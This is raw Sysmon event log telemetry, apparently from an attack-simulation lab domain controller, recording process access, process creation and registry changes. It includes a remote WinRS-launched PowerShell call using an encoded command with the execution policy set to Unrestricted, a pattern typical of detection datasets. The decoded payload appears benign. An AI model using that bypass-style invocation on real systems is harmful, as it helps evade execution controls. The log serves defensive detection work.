13:34:38.892{59A5CD1D-8E46-6005-0C00-00000000A301}596484C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002738Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:38.892{59A5CD1D-8E46-6005-0C00-00000000A301}596484C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002737Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:38.892{59A5CD1D-8E46-6005-0C00-00000000A301}596484C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002736Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:38.892{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-8E6E-6005-7F00-00000000A301}4292C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000002735Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:38.892{59A5CD1D-8E6E-6005-7E00-00000000A301}42804284C:\Windows\system32\cmd.exe{59A5CD1D-8E6E-6005-7F00-00000000A301}4292C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000002734Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:38.899{59A5CD1D-8E6E-6005-7F00-00000000A301}4292C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXEPowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand 
KABHAGUAdAAtAFcAbQBpAE8AYgBqAGUAYwB0ACAALQBDAGwAYQBzAHMATgBhAG0AZQAgAFcAaQBuADMAMgBfAE8AcABlAHIAYQB0AGkAbgBnAFMAeQBzAHQAZQBtACkALgBMAGEAcwB0AEIAbwBvAHQAVQBwAFQAaQBtAGUAC:\Users\Administrator\ATTACKRANGE\Administrator{59A5CD1D-8E6A-6005-A5C5-050000000000}0x5c5a50HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{59A5CD1D-8E6E-6005-7E00-00000000A301}4280C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /C PowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand KABHAGUAdAAtAFcAbQBpAE8AYgBqAGUAYwB0ACAALQBDAGwAYQBzAHMATgBhAG0AZQAgAFcAaQBuADMAMgBfAE8AcABlAHIAYQB0AGkAbgBnAFMAeQBzAHQAZQBtACkALgBMAGEAcwB0AEIAbwBvAHQAVQBwAFQAaQBtAGUA 10341000x80000000000000002733Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:38.892{59A5CD1D-8E6E-6005-7D00-00000000A301}41724216C:\Windows\system32\conhost.exe{59A5CD1D-8E6E-6005-7E00-00000000A301}4280C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002732Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:38.892{59A5CD1D-8E46-6005-0C00-00000000A301}596484C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002731Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:38.892{59A5CD1D-8E46-6005-0C00-00000000A301}596484C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002730Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:38.892{59A5CD1D-8E46-6005-0C00-00000000A301}596484C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002729Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:38.892{59A5CD1D-8E46-6005-0C00-00000000A301}596484C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002728Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:38.892{59A5CD1D-8E46-6005-0C00-00000000A301}596484C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002727Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:38.892{59A5CD1D-8E46-6005-0C00-00000000A301}596484C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002726Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:38.892{59A5CD1D-8E46-6005-0C00-00000000A301}596484C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002725Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:38.892{59A5CD1D-8E46-6005-0C00-00000000A301}596484C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002724Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:38.892{59A5CD1D-8E46-6005-0C00-00000000A301}596484C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002723Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:38.892{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-8E6E-6005-7E00-00000000A301}4280C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000002722Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:38.892{59A5CD1D-8E6E-6005-7C00-00000000A301}41524244C:\Windows\system32\WinrsHost.exe{59A5CD1D-8E6E-6005-7E00-00000000A301}4280C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\WinrsHost.exe+2c94|C:\Windows\system32\WinrsHost.exe+2eb1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b 154100x80000000000000002721Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:38.893{59A5CD1D-8E6E-6005-7E00-00000000A301}4280C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /C PowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand 
KABHAGUAdAAtAFcAbQBpAE8AYgBqAGUAYwB0ACAALQBDAGwAYQBzAHMATgBhAG0AZQAgAFcAaQBuADMAMgBfAE8AcABlAHIAYQB0AGkAbgBnAFMAeQBzAHQAZQBtACkALgBMAGEAcwB0AEIAbwBvAHQAVQBwAFQAaQBtAGUAC:\Users\Administrator\ATTACKRANGE\Administrator{59A5CD1D-8E6A-6005-A5C5-050000000000}0x5c5a50HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{59A5CD1D-8E6E-6005-7C00-00000000A301}4152C:\Windows\System32\winrshost.exeC:\Windows\system32\WinrsHost.exe -Embedding 10341000x80000000000000002720Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:38.892{59A5CD1D-8E44-6005-0B00-00000000A301}856896C:\Windows\system32\lsass.exe{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002719Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:38.892{59A5CD1D-8E44-6005-0B00-00000000A301}856896C:\Windows\system32\lsass.exe{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002718Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:38.876{59A5CD1D-8E44-6005-0B00-00000000A301}856896C:\Windows\system32\lsass.exe{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 
13241300x80000000000000002717Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:34:38.813{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\iphlpsvc\Parameters\ADHarvest\LastFetchDomainATTACKRANGE 13241300x80000000000000002716Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:34:38.813{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\iphlpsvc\Parameters\ADHarvest\LastSuccessfulADS&SFetchBinary Data 13241300x80000000000000002715Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:34:38.813{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\iphlpsvc\Parameters\ADHarvest\LastFetchContents* 13241300x80000000000000002714Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:34:38.813{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Dnscache\Parameters\Probe\{ad56e231-9b3d-476f-8f2e-efb58e5dfb43}\NetworkPerformsHijackingDWORD (0x00000000) 13241300x80000000000000002713Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:34:38.813{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Dnscache\Parameters\Probe\{ad56e231-9b3d-476f-8f2e-efb58e5dfb43}\LastProbeTimeDWORD (0x60058e6e) 13241300x80000000000000002712Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:34:38.813{59A5CD1D-8E46-6005-1100-00000000A301}1172C:\Windows\system32\svchost.exeHKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles\{AD56E231-9B3D-476F-8F2E-EFB58E5DFB43}\DateLastConnectedBinary Data 
13241300x80000000000000002711Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:34:38.813{59A5CD1D-8E46-6005-1100-00000000A301}1172C:\Windows\system32\svchost.exeHKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles\{AD56E231-9B3D-476F-8F2E-EFB58E5DFB43}\NameTypeDWORD (0x00000006) 13241300x80000000000000002710Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:34:38.813{59A5CD1D-8E46-6005-1100-00000000A301}1172C:\Windows\system32\svchost.exeHKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles\{AD56E231-9B3D-476F-8F2E-EFB58E5DFB43}\DateCreatedBinary Data 13241300x80000000000000002709Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:34:38.813{59A5CD1D-8E46-6005-1100-00000000A301}1172C:\Windows\system32\svchost.exeHKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles\{AD56E231-9B3D-476F-8F2E-EFB58E5DFB43}\CategoryDWORD (0x00000002) 13241300x80000000000000002708Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:34:38.813{59A5CD1D-8E46-6005-1100-00000000A301}1172C:\Windows\system32\svchost.exeHKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles\{AD56E231-9B3D-476F-8F2E-EFB58E5DFB43}\ManagedDWORD (0x00000001) 13241300x80000000000000002707Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:34:38.813{59A5CD1D-8E46-6005-1100-00000000A301}1172C:\Windows\system32\svchost.exeHKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles\{AD56E231-9B3D-476F-8F2E-EFB58E5DFB43}\Descriptionattackrange.local 13241300x80000000000000002706Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:34:38.813{59A5CD1D-8E46-6005-1100-00000000A301}1172C:\Windows\system32\svchost.exeHKLM\SOFTWARE\Microsoft\Windows 
